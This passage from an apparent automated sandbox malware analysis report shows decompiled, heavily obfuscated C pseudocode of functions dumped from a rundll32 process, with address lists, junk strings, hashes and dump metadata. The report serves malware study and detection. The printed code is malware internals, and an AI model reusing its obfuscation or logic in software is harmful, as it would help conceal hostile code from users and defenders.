				_v104 = _v104 ^ 0x005127d0;
				_v84 = 0x255b;
				_v84 = _v84 ^ 0x83eabf17;
				_v84 = _v84 + 0xffff710d;
				_v84 = _v84 ^ 0x83ea3b69;
				_v24 = 0x8e61;
				_v24 = _v24 << 1;
				_v24 = _v24 ^ 0x000142b1;
				_v28 = 0xd02c;
				_t308 = 0x6d;
				_v28 = _v28 * 0xc;
				_v28 = _v28 ^ 0x000989e6;
				_v108 = 0x9291;
				_v108 = _v108 >> 0xc;
				_v108 = _v108 | 0xaa78c0ed;
				_v108 = _v108 << 2;
				_v108 = _v108 ^ 0xa9e36c15;
				_v40 = 0x1d9c;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 ^ 0x00002e10;
				_v92 = 0x6d56;
				_v92 = _v92 + 0xffff48f9;
				_v92 = _v92 / _t308;
				_v92 = _v92 ^ 0x02590f99;
				_v112 = 0x8cc7;
				_v112 = _v112 >> 5;
				_v112 = _v112 >> 6;
				_v112 = _v112 >> 4;
				_v112 = _v112 ^ 0x00002307;
				_v120 = 0x25d;
				_v120 = _v120 ^ 0xde3e2837;
				_v120 = _v120 << 1;
				_v120 = _v120 * 0x6d;
				_v120 = _v120 ^ 0x40f04d83;
				_v124 = 0x1346;
				_v124 = _v124 | 0x8bdbfbed;
				_v124 = _v124 * 0x1f;
				_v124 = _v124 + 0x9594;
				_v124 = _v124 ^ 0xefa4299e;
				_v64 = 0x50cb;
				_t309 = 0x4b;
				_v64 = _v64 * 0x70;
				_v64 = _v64 + 0xffff75a4;
				_v64 = _v64 ^ 0x0022e5e6;
				_v68 = 0xa44b;
				_v68 = _v68 << 0xa;
				_v68 = _v68 | 0x24395b4f;
				_v68 = _v68 ^ 0x26b96dac;
				_v72 = 0x10f6;
				_v72 = _v72 | 0x7400ac30;
				_v72 = _v72 ^ 0x9c95e387;
				_v72 = _v72 ^ 0xe8956ee0;
				_v76 = 0x2044;
				_t128 =  &_v76; // 0x2044
				_v76 =  *_t128 / _t309;
				_v76 = _v76 ^ 0xd90ce65f;
				_v76 = _v76 ^ 0xd90c83fa;
				_v32 = 0x9da5;
				_v32 = _v32 << 2;
				_v32 = _v32 ^ 0x000210ff;
				_v96 = 0x5549;
				_t310 = 0x69;
				_v96 = _v96 * 0x1c;
				_v96 = _v96 << 9;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x254fd504;
				_v116 = 0xbb3d;
				_v116 = _v116 ^ 0x96480b4a;
				_v116 = _v116 + 0x485d;
				_v116 = _v116 + 0x3437;
				_v116 = _v116 ^ 0x964901b8;
				_v44 = 0xfe77;
				_v44 = _v44 << 0xf;
				_v44 = _v44 ^ 0x7f3b887b;
				_v48 = 0xc7ca;
				_v48 = _v48 + 0xc6b7;
				_v48 = _v48 ^ 0x0001ab71;
				_v52 = 0xfb6a;
				_t311 = _v16;
				_v52 = _v52 / _t310;
				_v52 = _v52 ^ 0x0000404e;
				_v56 = 0x165c;
				_v56 = _v56 | 0x15d5c492;
				_v56 = _v56 ^ 0x15d5f293;
				_v36 = 0x8326;
				_v36 = _v36 + 0x3feb;
				_v36 = _v36 ^ 0x0000ec2c;
				_v88 = 0x112f;
				_v88 = _v88 + 0xb78;
				_v88 = _v88 ^ 0x019c9473;
				_v88 = _v88 ^ 0x019cb80e;
				while(1) {
					_t255 = _v60;
					while(1) {
						L2:
						_t317 = _t280 - 0x23ed989b;
						if(_t317 > 0) {
							break;
						}
						if(_t317 == 0) {
							_t280 = 0x7106a5f;
							continue;
						}
						if(_t280 == 0x31e7839) {
							_t214 =  *0x1001f9d0 + 8; // 0x1001fe08
							_t283 =  &_v20;
							E001A8963(_t283, _t280,  *_t214, _v108, _v40, _v92, _v112);
							_t314 =  &(_t314[6]);
							asm("sbb ecx, ecx");
							_t280 = (_t283 & 0x01628cce) + 0x14c82368;
							while(1) {
								_t255 = _v60;
								goto L2;
							}
						}
						if(_t280 == 0x7106a5f) {
							if( *((intOrPtr*)(_t278 + 4)) < 0x74) {
								L30:
								return _t305;
							}
							_t280 = 0x3064cab0;
							continue;
						}
						if(_t280 == 0xc3de740) {
							_t201 =  *0x1001f9d0 + 0x30; // 0x10020bfc
							E001B1079(_v20, _v116, _v44, _v48, _v52, _v16, _v56,  *_t201);
							_t314 = _t314 - 0xc + 0x24;
							_t305 =  !=  ? 1 : _t305;
							_t280 = 0x3a9b4c52;
							while(1) {
								_t255 = _v60;
								goto L2;
							}
						}
						if(_t280 == 0x14c82368) {
							if(_t305 == 0) {
								E001AE380(_v24,  *_t306, _v28);
							}
							goto L30;
						}
						if(_t280 != 0x162ab036) {
							L26:
							if(_t280 == 0x13b75261) {
								goto L30;
							}
							while(1) {
								_t255 = _v60;
								goto L2;
							}
						}
						E001A5C9F(_v120, _t255, _t311,  *_t306, _v124);
						_t314 =  &(_t314[3]);
						_t280 = 0x2c6fc1fa;
						while(1) {
							_t255 = _v60;
							goto L2;
						}
					}
					if(_t280 == 0x2c6fc1fa) {
						_push(_t280);
						_t237 =  *0x1001f9d0 + 4; // 0x5a
						_t258 = E001B7B8E(_v20,  *_t306,  *_t237, _v64, _v68, _v72, _v76, _v32, _v96, _t280, _t306 + 4);
						_t314 =  &(_t314[0xa]);
						if(_t258 == 0) {
							_t280 = 0x3a9b4c52;
							goto L26;
						}
						_t280 = 0xc3de740;
						while(1) {
							_t255 = _v60;
							goto L2;
						}
					}
					if(_t280 == 0x3064cab0) {
						_t280 = 0x34f18512;
						goto L2;
					}
					if(_t280 == 0x34f18512) {
						 *((intOrPtr*)(_t306 + 4)) =  *((intOrPtr*)(_t278 + 4)) - 0x74;
						_push(_t280);
						_push(_t280);
						_t273 = E001B922B( *((intOrPtr*)(_t306 + 4)));
						_t314 =  &(_t314[3]);
						 *_t306 = _t273;
						if(_t273 == 0) {
							goto L30;
						}
						_t274 =  *_t278;
						_t280 = 0x31e7839;
						_v16 = _t274;
						_t255 = _t274 + 0x74;
						_v60 = _t274 + 0x74;
						_t311 =  &_v116;
						goto L2;
					}
					if(_t280 != 0x3a9b4c52) {
						goto L26;
					}
					_push(_t280);
					E001A69B4(_v20);
					_t280 = 0x14c82368;
				}
			}

0x001a6ee8
0x001a6ef2
0x001a6ef3
0x001a6efa
0x001a6efc
0x001a6f03
0x001a6f0a
0x001a6f0b
0x001a6f0c
0x001a6f11
0x001a6f1c
0x001a6f1e
0x001a6f29
0x001a6f2c
0x001a6f35
0x001a6f3d
0x001a6f42
0x001a6f4a
0x001a6f52
0x001a6f5a
0x001a6f62
0x001a6f6a
0x001a6f72
0x001a6f77
0x001a6f7f
0x001a6f87
0x001a6f95
0x001a6f9a
0x001a6fa0
0x001a6fa8
0x001a6fb0
0x001a6fb8
0x001a6fc0
0x001a6fc8
0x001a6fd0
0x001a6fd8
0x001a6fdc
0x001a6fe4
0x001a6ff1
0x001a6ff2
0x001a6ff6
0x001a6ffe
0x001a7006
0x001a700b
0x001a7013
0x001a7018
0x001a7020
0x001a7028
0x001a702d
0x001a7035
0x001a703d
0x001a704b
0x001a704f
0x001a7057
0x001a705f
0x001a7064
0x001a7069
0x001a706e
0x001a7076
0x001a707e
0x001a7086
0x001a708f
0x001a7093
0x001a709b
0x001a70a3
0x001a70b0
0x001a70b4
0x001a70be
0x001a70c6
0x001a70d5
0x001a70d8
0x001a70dc
0x001a70e4
0x001a70ec
0x001a70f4
0x001a70f9
0x001a7101
0x001a7109
0x001a7111
0x001a7119
0x001a7121
0x001a7129
0x001a7131
0x001a7139
0x001a713d
0x001a7145
0x001a714d
0x001a7155
0x001a715a
0x001a7162
0x001a716f
0x001a7170
0x001a7174
0x001a7179
0x001a717d
0x001a7185
0x001a718d
0x001a7195
0x001a719d
0x001a71a5
0x001a71ad
0x001a71b5
0x001a71ba
0x001a71c2
0x001a71ca
0x001a71d2
0x001a71da
0x001a71e8
0x001a71ec
0x001a71f0
0x001a71f8
0x001a7200
0x001a7208
0x001a7210
0x001a7218
0x001a7220
0x001a7228
0x001a7230
0x001a7238
0x001a7240
0x001a7248
0x001a7248
0x001a724c
0x001a724c
0x001a724c
0x001a7252
0x00000000
0x00000000
0x001a7258
0x001a734d
0x00000000
0x001a734d
0x001a7264
0x001a7325
0x001a7329
0x001a7330
0x001a7335
0x001a733a
0x001a7342
0x001a7248
0x001a7248
0x00000000
0x001a7248
0x001a7248
0x001a7270
0x001a7300
0x001a745e
0x001a7467
0x001a7467
0x001a7306
0x00000000
0x001a7306
0x001a727c
0x001a72ba
0x001a72e2
0x001a72e9
0x001a72ef
0x001a72f2
0x001a7248
0x001a7248
0x00000000
0x001a7248
0x001a7248
0x001a7284
0x001a744c
0x001a7458
0x001a745d
0x00000000
0x001a744c
0x001a7290
0x001a743d
0x001a7443
0x00000000
0x00000000
0x001a7248
0x001a7248
0x00000000
0x001a7248
0x001a7248
0x001a72a3
0x001a72a8
0x001a72ab
0x001a7248
0x001a7248
0x00000000
0x001a7248
0x001a7248
0x001a735d
0x001a73f3
0x001a741f
0x001a7422
0x001a7427
0x001a742c
0x001a7438
0x00000000
0x001a7438
0x001a742e
0x001a7248
0x001a7248
0x00000000
0x001a7248
0x001a7248
0x001a7369
0x001a73e9
0x00000000
0x001a73e9
0x001a7371
0x001a73a2
0x001a73b5
0x001a73b6
0x001a73ba
0x001a73bf
0x001a73c2
0x001a73c6
0x00000000
0x00000000
0x001a73cc
0x001a73ce
0x001a73d6
0x001a73da
0x001a73dd
0x001a73e1
0x00000000
0x001a73e1
0x001a7379
0x00000000
0x00000000
0x001a738b
0x001a738c
0x001a7392
0x001a7392

Strings

74, xrefs: 001A719D
[%, xrefs: 001A6FB0
", xrefs: 001A70E4
wC, xrefs: 001A6F7F
D m, xrefs: 001A7131
N@, xrefs: 001A71F0
O[9$, xrefs: 001A70F9
IU, xrefs: 001A7162
,, xrefs: 001A7220

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,$74$D m$IU$N@$O[9$$[%$wC$"
API String ID: 0-558422104
Opcode ID: d4e43c25dbae59a4334c4e30608d07fe0e77cc90ba6ff40983b20ee7b1b9eeb7
Instruction ID: e9e1b5d303e400408b662bb1e982a53d7c970282819d3ae3c6e47692f36df9ed
Opcode Fuzzy Hash: d4e43c25dbae59a4334c4e30608d07fe0e77cc90ba6ff40983b20ee7b1b9eeb7
Instruction Fuzzy Hash: FCD143755083409FD768CF65C88A81BBBF1BBC5748F508A1DF5A6862A1D3B9CA48CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001B4B48, Relevance: 11.5, Strings: 9, Instructions: 218
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E001B4B48() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t209;
				signed int _t210;
				signed int _t215;
				void* _t217;
				void* _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t246;
				signed int* _t248;

				_t248 =  &_v80;
				_v28 = 0xfa43;
				_v28 = _v28 + 0xffff64db;
				_t217 = 0x13dbd413;
				_v28 = _v28 + 0xffffd5d5;
				_v28 = _v28 ^ 0x000134f3;
				_v44 = 0xe15e;
				_v44 = _v44 + 0xffffcae3;
				_v44 = _v44 + 0xffff3556;
				_v44 = _v44 ^ 0xfffff2c7;
				_v80 = 0x530b;
				_v80 = _v80 ^ 0x3fe69bb9;
				_v80 = _v80 | 0x4be8190d;
				_v80 = _v80 + 0xffffd44d;
				_v80 = _v80 ^ 0x7feeea52;
				_v52 = 0xe8d1;
				_v52 = _v52 + 0xffff21e5;
				_v52 = _v52 ^ 0x098fee2a;
				_v52 = _v52 ^ 0x098fef4c;
				_v4 = 0x1295;
				_v4 = _v4 >> 4;
				_v4 = _v4 ^ 0x00006adf;
				_v24 = 0x2f65;
				_v24 = _v24 << 0xd;
				_v24 = _v24 * 0x3f;
				_t239 = 0;
				_v24 = _v24 ^ 0x753b3344;
				_v60 = 0x50a7;
				_t240 = 0x24;
				_v60 = _v60 / _t240;
				_t241 = 0x43;
				_v60 = _v60 * 0x29;
				_v60 = _v60 + 0xfffffdce;
				_v60 = _v60 ^ 0x00004fc4;
				_v72 = 0x5e36;
				_v72 = _v72 | 0x0485770b;
				_v72 = _v72 >> 8;
				_v72 = _v72 >> 0xe;
				_v72 = _v72 ^ 0x0000439e;
				_v8 = 0xc87a;
				_v8 = _v8 + 0xffffbc11;
				_v8 = _v8 ^ 0x0000b2bf;
				_v76 = 0x1492;
				_v76 = _v76 << 9;
				_v76 = _v76 / _t241;
				_v76 = _v76 ^ 0x0d275196;
				_v76 = _v76 ^ 0x0d27c2b1;
				_v40 = 0xba33;
				_v40 = _v40 + 0x4a5;
				_v40 = _v40 >> 1;
				_v40 = _v40 ^ 0x000057b2;
				_v32 = 0xffd5;
				_v32 = _v32 ^ 0x3e7e029e;
				_v32 = _v32 + 0xffff5154;
				_v32 = _v32 ^ 0x3e7e6a26;
				_v64 = 0xbf35;
				_v64 = _v64 ^ 0xe1ac7b80;
				_v64 = _v64 + 0xffff702f;
				_t242 = 0x62;
				_v64 = _v64 / _t242;
				_v64 = _v64 ^ 0x024dad4d;
				_v68 = 0x4a07;
				_v68 = _v68 + 0xffffc583;
				_v68 = _v68 ^ 0xf8490e58;
				_v68 = _v68 + 0xffff6961;
				_v68 = _v68 ^ 0xf8486714;
				_v36 = 0x947d;
				_v36 = _v36 ^ 0x02a278b7;
				_t243 = 0x49;
				_v36 = _v36 / _t243;
				_v36 = _v36 ^ 0x0009425c;
				_v12 = 0x5df1;
				_t244 = 0x5d;
				_t247 = _v4;
				_v12 = _v12 / _t244;
				_t245 = _v4;
				_t216 = _v4;
				_v12 = _v12 * 0x74;
				_v12 = _v12 ^ 0x000012fd;
				_v16 = 0x3aaa;
				_v16 = _v16 >> 4;
				_v16 = _v16 + 0xe687;
				_v16 = _v16 ^ 0x0000fb2b;
				_v20 = 0x1461;
				_v20 = _v20 << 9;
				_v20 = _v20 >> 0x10;
				_v20 = _v20 ^ 0x0000567d;
				_v56 = 0xa3a7;
				_v56 = _v56 << 0x10;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 * 0x49;
				_v56 = _v56 ^ 0x02eaa81a;
				_v48 = 0xd302;
				_v48 = _v48 * 0x5a;
				_v48 = _v48 >> 7;
				_v48 = _v48 ^ 0x000f9462;
				while(1) {
					_t209 = 0x5c;
					L2:
					while(_t217 != 0x4dc0f45) {
						if(_t217 == 0xbb35233) {
							E001A24A4(_t247, _v32, _v64, _v68, _v36);
							_t248 =  &(_t248[3]);
							_t217 = 0xd909d60;
							while(1) {
								_t209 = 0x5c;
								goto L2;
							}
						} else {
							if(_t217 == 0xd909d60) {
								E001A24A4(_t216, _v12, _v16, _v20, _v56);
							} else {
								if(_t217 == 0x13dbd413) {
									_t217 = 0x28ffab12;
									continue;
								} else {
									if(_t217 == 0x1afb5bd3) {
										E001AE7A1(_v72, _v8, _v76, _t247, _v40);
										_t248 =  &(_t248[3]);
										_t239 =  !=  ? 1 : _t239;
										_t217 = 0xbb35233;
										while(1) {
											_t209 = 0x5c;
											goto L2;
										}
									} else {
										if(_t217 == 0x28ffab12) {
											_t246 =  *0x10020724;
											while( *_t246 != _t209) {
												_t246 = _t246 + 2;
											}
											_t245 = _t246 + 2;
											_t217 = 0x2f784668;
											continue;
										} else {
											if(_t217 != 0x2f784668) {
												L21:
												if(_t217 != 0x2f775aa3) {
													continue;
												} else {
												}
											} else {
												_t215 = E001B92EB(_t217, _v44, _v48, _t217, _v80, _v52);
												_t216 = _t215;
												_t248 =  &(_t248[4]);
												if(_t215 != 0) {
													_t217 = 0x4dc0f45;
													while(1) {
														_t209 = 0x5c;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
						}
						L24:
						return _t239;
					}
					_t210 = E001AD572(_v4, _v24, _t216, _v28, _t245, _v60);
					_t247 = _t210;
					_t248 =  &(_t248[4]);
					if(_t210 == 0) {
						_t217 = 0xd909d60;
						_t209 = 0x5c;
						goto L21;
					} else {
						_t217 = 0x1afb5bd3;
						continue;
					}
					goto L24;
				}
			}

0x001b4b48
0x001b4b4f
0x001b4b59
0x001b4b61
0x001b4b66
0x001b4b6e
0x001b4b76
0x001b4b7e
0x001b4b86
0x001b4b8e
0x001b4b96
0x001b4b9e
0x001b4ba6
0x001b4bae
0x001b4bb6
0x001b4bbe
0x001b4bc6
0x001b4bce
0x001b4bd6
0x001b4bde
0x001b4be6
0x001b4beb
0x001b4bf3
0x001b4bfb
0x001b4c05
0x001b4c09
0x001b4c0b
0x001b4c13
0x001b4c21
0x001b4c26
0x001b4c31
0x001b4c34
0x001b4c38
0x001b4c40
0x001b4c48
0x001b4c50
0x001b4c58
0x001b4c5d
0x001b4c62
0x001b4c6a
0x001b4c72
0x001b4c7a
0x001b4c82
0x001b4c8a
0x001b4c97
0x001b4c9b
0x001b4ca3
0x001b4cab
0x001b4cb3
0x001b4cbb
0x001b4cbf
0x001b4cc7
0x001b4ccf
0x001b4cd7
0x001b4cdf
0x001b4ce7
0x001b4cef
0x001b4cf7
0x001b4d03
0x001b4d06
0x001b4d0a
0x001b4d12
0x001b4d1a
0x001b4d22
0x001b4d2a
0x001b4d34
0x001b4d3c
0x001b4d44
0x001b4d52
0x001b4d57
0x001b4d5d
0x001b4d65
0x001b4d71
0x001b4d74
0x001b4d78
0x001b4d81
0x001b4d85
0x001b4d89
0x001b4d8d
0x001b4d95
0x001b4d9d
0x001b4da2
0x001b4daa
0x001b4db2
0x001b4dba
0x001b4dbf
0x001b4dc4
0x001b4dcc
0x001b4dd4
0x001b4dd9
0x001b4de3
0x001b4de7
0x001b4def
0x001b4dfc
0x001b4e00
0x001b4e05
0x001b4e0d
0x001b4e0f
0x00000000
0x001b4e10
0x001b4e22
0x001b4eea
0x001b4eef
0x001b4ef2
0x001b4e0d
0x001b4e0f
0x00000000
0x001b4e0f
0x001b4e28
0x001b4e2e
0x001b4f4e
0x001b4e34
0x001b4e3a
0x001b4ece
0x00000000
0x001b4e40
0x001b4e46
0x001b4eb4
0x001b4ebb
0x001b4ec1
0x001b4ec4
0x001b4e0d
0x001b4e0f
0x00000000
0x001b4e0f
0x001b4e48
0x001b4e4e
0x001b4e86
0x001b4e91
0x001b4e8e
0x001b4e8e
0x001b4e96
0x001b4e99
0x00000000
0x001b4e50
0x001b4e56
0x001b4f2e
0x001b4f34
0x00000000
0x00000000
0x001b4f3a
0x001b4e5c
0x001b4e6d
0x001b4e72
0x001b4e74
0x001b4e79
0x001b4e7f
0x001b4e0d
0x001b4e0f
0x00000000
0x001b4e0f
0x001b4e0d
0x001b4e79
0x001b4e56
0x001b4e4e
0x001b4e46
0x001b4e3a
0x001b4e2e
0x001b4f56
0x001b4f5f
0x001b4f5f
0x001b4f0e
0x001b4f13
0x001b4f15
0x001b4f1a
0x001b4f28
0x001b4f2d
0x00000000
0x001b4f1c
0x001b4f1c
0x00000000
0x001b4f1c
0x00000000
0x001b4f1a

Strings

hFx/, xrefs: 001B4E50
ar-KW, xrefs: 001B4E86
hFx/, xrefs: 001B4E99
&j~>, xrefs: 001B4CDF
}V, xrefs: 001B4DC4
D3;u, xrefs: 001B4C0B
\B, xrefs: 001B4D5D
^, xrefs: 001B4B76
6^, xrefs: 001B4C48

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &j~>$6^$D3;u$\B$^$ar-KW$hFx/$hFx/$}V
API String ID: 0-338867914
Opcode ID: 6d10da165b7459f852ae888984828e5a3af22162fd8ce4573f6a0f35cbdb102f
Instruction ID: 28537d5329686deef609fc01709626ae6bfc538f2b72c847a4af7a229a21f915
Opcode Fuzzy Hash: 6d10da165b7459f852ae888984828e5a3af22162fd8ce4573f6a0f35cbdb102f
Instruction Fuzzy Hash: 83A143715083418FD358CF69C88A41BFBF2BBD4718F148A1DF596862A0D3B9CA098F87

Uniqueness

Uniqueness Score: -1.00%

Function 001C12B6, Relevance: 11.4, Strings: 9, Instructions: 183
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E001C12B6(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t153;
				signed int _t162;
				signed int _t170;
				void* _t181;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				void* _t189;
				signed int* _t208;
				signed int* _t211;

				_push(_a12);
				_t207 = _a4;
				_t208 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				L001CE171(_t153);
				_v60 = 0xaf2d;
				_t211 =  &(( &_v108)[5]);
				_t189 = 0x37ea2971;
				_t183 = 0x30;
				_v60 = _v60 / _t183;
				_v60 = _v60 ^ 0x00004201;
				_v92 = 0x7cb3;
				_t184 = 0x57;
				_v92 = _v92 / _t184;
				_v92 = _v92 + 0x9582;
				_v92 = _v92 ^ 0x0000dc29;
				_v108 = 0x8257;
				_v108 = _v108 >> 1;
				_v108 = _v108 >> 0xc;
				_t185 = 9;
				_v108 = _v108 * 0x72;
				_v108 = _v108 ^ 0x00004fc2;
				_v96 = 0x40c5;
				_v96 = _v96 ^ 0xa116dc0c;
				_v96 = _v96 ^ 0x7e568c0f;
				_v96 = _v96 ^ 0xdf403fd9;
				_v52 = 0x31c9;
				_v52 = _v52 | 0xd6f66353;
				_v52 = _v52 ^ 0xd6f64a6d;
				_v88 = 0x36e;
				_v88 = _v88 + 0x45a7;
				_v88 = _v88 ^ 0x4bbc027d;
				_v88 = _v88 ^ 0x4bbc3029;
				_v56 = 0x4f5b;
				_v56 = _v56 | 0x06421eeb;
				_v56 = _v56 ^ 0x06421dbc;
				_v104 = 0x1be2;
				_v104 = _v104 ^ 0xa0f43b33;
				_v104 = _v104 + 0xb886;
				_v104 = _v104 + 0x9b4d;
				_v104 = _v104 ^ 0xa0f5230d;
				_v100 = 0xf441;
				_v100 = _v100 | 0x37752f6e;
				_v100 = _v100 << 2;
				_v100 = _v100 ^ 0xddd7fc83;
				_v64 = 0xb621;
				_v64 = _v64 ^ 0xe17d0a38;
				_v64 = _v64 ^ 0xe17da420;
				_v76 = 0x6c67;
				_v76 = _v76 | 0x1df80c0d;
				_v76 = _v76 / _t185;
				_v76 = _v76 ^ 0x03544df1;
				_v80 = 0xa2b5;
				_v80 = _v80 ^ 0x3ecf2107;
				_v80 = _v80 << 8;
				_v80 = _v80 ^ 0xcf839442;
				_v84 = 0xd8d1;
				_v84 = _v84 | 0xc8688e93;
				_v84 = _v84 + 0x4b2f;
				_v84 = _v84 ^ 0xc869620a;
				_v48 = 0x1cf5;
				_t162 = _v48;
				_t186 = 0x11;
				_t205 = _t162 % _t186;
				_v48 = _t162 / _t186;
				_v48 = _v48 ^ 0x0000080a;
				_v68 = 0x887a;
				_v68 = _v68 << 9;
				_v68 = _v68 + 0x2221;
				_v68 = _v68 ^ 0x01112a3a;
				_v72 = 0x5979;
				_v72 = _v72 >> 8;
				_v72 = _v72 + 0xffffd314;
				_v72 = _v72 ^ 0xffffbc88;
				do {
					while(_t189 != 0x206ebdf) {
						if(_t189 == 0xe1b62f3) {
							_push(_t189);
							_push(_t189);
							_t170 = L001D9E2B(_t208[1]);
							_t211 =  &(_t211[3]);
							 *_t208 = _t170;
							__eflags = _t170;
							if(__eflags != 0) {
								_t189 = 0x1e956d51;
								continue;
							}
						} else {
							if(_t189 == 0x10034e2b) {
								L001D5677(_v48, _v68, __eflags, _t207 + 4,  &_v44, _v72);
							} else {
								if(_t189 == 0x168c5bd0) {
									_t208[1] = L001DCDEF(_t207);
									_t181 = L001D8E0A(0x1000, _t205, __eflags, 0x400);
									_t211 = _t211 - 0xc + 0x10;
									_t189 = 0xe1b62f3;
									_t208[1] = _t208[1] + _t181;
									continue;
								} else {
									if(_t189 == 0x1e956d51) {
										_t205 =  &_v44;
										L001DCF95(_v100,  &_v44, _t208, _v64);
										_t189 = 0x206ebdf;
										continue;
									} else {
										if(_t189 != 0x37ea2971) {
											goto L13;
										} else {
											 *_t208 = 0;
											_t189 = 0x168c5bd0;
											_t208[1] = 0;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t208;
						_t152 =  *_t208 != 0;
						__eflags = _t152;
						return 0 | _t152;
					}
					_t205 = _v76;
					L001C31A5( *_t207, _v76, _v80,  &_v44, _v84);
					_t211 =  &(_t211[3]);
					_t189 = 0x10034e2b;
					L13:
					__eflags = _t189 - 0x16072bb2;
				} while (__eflags != 0);
				goto L16;
			}

0x001c12bd
0x001c12c4
0x001c12cb
0x001c12cd
0x001c12d4
0x001c12d5
0x001c12d6
0x001c12d7
0x001c12dc
0x001c12e4
0x001c12ed
0x001c12f4
0x001c12f9
0x001c12ff
0x001c1307
0x001c1313
0x001c1318
0x001c131e
0x001c1326
0x001c132e
0x001c1336
0x001c133a
0x001c1344
0x001c1345
0x001c1349
0x001c1351
0x001c1359
0x001c1361
0x001c1369
0x001c1371
0x001c1379
0x001c1381
0x001c1389
0x001c1391
0x001c1399
0x001c13a1
0x001c13a9
0x001c13b1
0x001c13b9
0x001c13c1
0x001c13c9
0x001c13d1
0x001c13d9
0x001c13e1
0x001c13e9
0x001c13f1
0x001c13f9
0x001c13fe
0x001c1406
0x001c140e
0x001c1416
0x001c141e
0x001c1426
0x001c1434
0x001c1438
0x001c1440
0x001c1448
0x001c1450
0x001c1455
0x001c145d
0x001c1465
0x001c146d
0x001c1475
0x001c147d
0x001c1485
0x001c148d
0x001c148e
0x001c1495
0x001c1499
0x001c14a1
0x001c14a9
0x001c14ae
0x001c14b6
0x001c14be
0x001c14c6
0x001c14cb
0x001c14d3
0x001c14dd
0x001c14dd
0x001c14ef
0x001c1589
0x001c158a
0x001c158e
0x001c1593
0x001c1596
0x001c1598
0x001c159a
0x001c159c
0x00000000
0x001c159c
0x001c14f5
0x001c14fb
0x001c15e9
0x001c1501
0x001c1503
0x001c1544
0x001c1564
0x001c1569
0x001c156c
0x001c1571
0x00000000
0x001c1505
0x001c150b
0x001c152a
0x001c152f
0x001c1536
0x00000000
0x001c150d
0x001c1513
0x00000000
0x001c1519
0x001c1519
0x001c151b
0x001c151d
0x00000000
0x001c151d
0x001c1513
0x001c150b
0x001c1503
0x001c14fb
0x001c15f2
0x001c15f4
0x001c15f8
0x001c15f8
0x001c15ff
0x001c15ff
0x001c15b3
0x001c15b9
0x001c15be
0x001c15c1
0x001c15c6
0x001c15c6
0x001c15c6
0x00000000

Strings

n/u7, xrefs: 001C13F1
/K, xrefs: 001C146D
8}, xrefs: 001C140E
yY, xrefs: 001C14BE
q)7, xrefs: 001C150D
!", xrefs: 001C14AE
gl, xrefs: 001C141E
q)7, xrefs: 001C12ED
[O, xrefs: 001C13A9

Memory Dump Source

Source File: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !"$/K$8}$[O$gl$n/u7$q)7$q)7$yY
API String ID: 0-4086401284
Opcode ID: 4ad6b7c249c1ba52a94339e21242decb2f10a0f6045985bef448929f9d30e9c5
Instruction ID: 732fe0dda23c80652a82264845479143c98daffaf9c225204a515c31794fbd03
Opcode Fuzzy Hash: 4ad6b7c249c1ba52a94339e21242decb2f10a0f6045985bef448929f9d30e9c5
Instruction Fuzzy Hash: D18173B1509301AFD358CF21C58A92BBBE1FBD5B08F90891DF596962A0D7B5DA08CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001A06B6, Relevance: 11.4, Strings: 9, Instructions: 183COMMON

Download Yara Rule

Strings

yY, xrefs: 001A08BE
n/u7, xrefs: 001A07F1
[O, xrefs: 001A07A9
8}, xrefs: 001A080E
gl, xrefs: 001A081E
q)7, xrefs: 001A06ED
q)7, xrefs: 001A090D
!", xrefs: 001A08AE
/K, xrefs: 001A086D

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

